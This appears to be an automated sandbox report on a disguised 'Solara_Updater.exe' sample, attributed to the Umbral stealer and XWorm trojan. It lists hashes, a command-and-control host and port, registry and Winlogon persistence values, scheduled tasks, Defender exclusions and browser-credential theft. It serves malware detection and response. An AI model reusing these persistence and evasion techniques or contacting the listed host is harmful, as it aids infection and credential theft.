umbral | 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solara_Updater.exe
Size

1.9MB
MD5

f4cffd7e6cca2b88bba1f19120e9255f
SHA1

28df62794d325206d1f61a400b5c5c682632e371
SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
SHA512

cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
SSDEEP

49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i

Score

10^/10

umbral xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

answer-riverside.gl.at.ply.gg:45691

Attributes

Install_directory
%AppData%
install_file
svhost.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023316-59.dat	family_umbral
behavioral2/memory/3340-68-0x000001A8475E0000-0x000001A847620000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023313-48.dat	family_xworm
behavioral2/memory/3376-63-0x0000000000470000-0x0000000000486000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Registration\\CRMLog\\Loader.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Registration\\CRMLog\\Loader.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Registration\\CRMLog\\Loader.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\""	bridgeblockportComBroker.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5380	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5404	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5428	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5976	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6020	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6064	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6140	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4528	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5108	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5408	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5432	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5568	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5544	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3628	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5640	3228	schtasks.exe	102
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4928	3228	schtasks.exe	102

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
91	5916	Loader.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1964	powershell.exe
5700	powershell.exe
5748	powershell.exe
5460	powershell.exe
3540	powershell.exe
1736	powershell.exe
6120	powershell.exe
5500	powershell.exe
5856	powershell.exe
4528	powershell.exe

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	Solara_Updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	sol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	XClient.exe

Executes dropped EXE 64 IoCs

pid	Process
1732	Loader.exe
1276	sol.exe
1936	Loader.exe
2480	sol.exe
3376	XClient.exe
3340	RustCheat.exe
1060	Loader.exe
2388	sol.exe
2728	XClient.exe
3896	RustCheat.exe
2772	Loader.exe
4004	sol.exe
1064	Loader.exe
2020	sol.exe
4440	Loader.exe
2552	sol.exe
2148	Loader.exe
1472	sol.exe
868	Loader.exe
3008	sol.exe
1064	Loader.exe
4568	sol.exe
3752	Loader.exe
2388	sol.exe
1472	Loader.exe
3096	sol.exe
4760	Loader.exe
1260	sol.exe
4328	bridgeblockportComBroker.exe
5316	bridgeblockportComBroker.exe
5532	XClient.exe
5608	RustCheat.exe
5752	Loader.exe
5812	sol.exe
6100	bridgeblockportComBroker.exe
5204	Loader.exe
6136	sol.exe
5508	bridgeblockportComBroker.exe
5704	Loader.exe
4396	sol.exe
5484	bridgeblockportComBroker.exe
3408	Loader.exe
2280	sol.exe
396	RuntimeBroker.exe
3496	Loader.exe
5168	sol.exe
5204	bridgeblockportComBroker.exe
6072	Loader.exe
5104	sol.exe
2224	bridgeblockportComBroker.exe
5960	Loader.exe
2632	sol.exe
5420	bridgeblockportComBroker.exe
2568	Loader.exe
980	sol.exe
2856	bridgeblockportComBroker.exe
1480	Loader.exe
3496	sol.exe
4004	bridgeblockportComBroker.exe
3728	Loader.exe
5604	sol.exe
2280	bridgeblockportComBroker.exe
4408	XClient.exe
3504	RustCheat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Windows\\Registration\\CRMLog\\Loader.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Google\\csrss.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Windows\\Registration\\CRMLog\\Loader.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Google\\csrss.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
59	ipinfo.io
83	ip-api.com
58	ipinfo.io
74	ip-api.com
104	ip-api.com
134	ip-api.com
144	ip-api.com
151	ip-api.com
25	ip-api.com
36	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC174D5A98CE104C60BF24872A9DF0C71.TMP	csc.exe
File created	\??\c:\Windows\System32\jpzkqk.exe	csc.exe

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\5940a34987c991	bridgeblockportComBroker.exe
File created	\??\c:\Program Files (x86)\Microsoft\Edge\Application\CSC421E32B0FE4E49CA8B405B3551F9DCDF.TMP	csc.exe
File created	C:\Program Files (x86)\Google\886983d96e3d3e	bridgeblockportComBroker.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe	bridgeblockportComBroker.exe
File created	\??\c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	csc.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe	bridgeblockportComBroker.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe	bridgeblockportComBroker.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\9e8d7a4ca61bd9	bridgeblockportComBroker.exe
File created	C:\Program Files\WindowsApps\dwm.exe	bridgeblockportComBroker.exe
File created	C:\Program Files (x86)\Google\csrss.exe	bridgeblockportComBroker.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Registration\CRMLog\Loader.exe	bridgeblockportComBroker.exe
File created	C:\Windows\Registration\CRMLog\87ba48885c7d9e	bridgeblockportComBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5380	schtasks.exe
5976	schtasks.exe
5568	schtasks.exe
5640	schtasks.exe
6060	schtasks.exe
3988	schtasks.exe
3628	schtasks.exe
4928	schtasks.exe
5432	schtasks.exe
5404	schtasks.exe
5428	schtasks.exe
6140	schtasks.exe
4528	schtasks.exe
5408	schtasks.exe
6020	schtasks.exe
6064	schtasks.exe
5108	schtasks.exe
232	schtasks.exe
5544	schtasks.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4920	wmic.exe
3416	wmic.exe
2428	wmic.exe
4348	wmic.exe
5964	wmic.exe
4204	wmic.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	bridgeblockportComBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
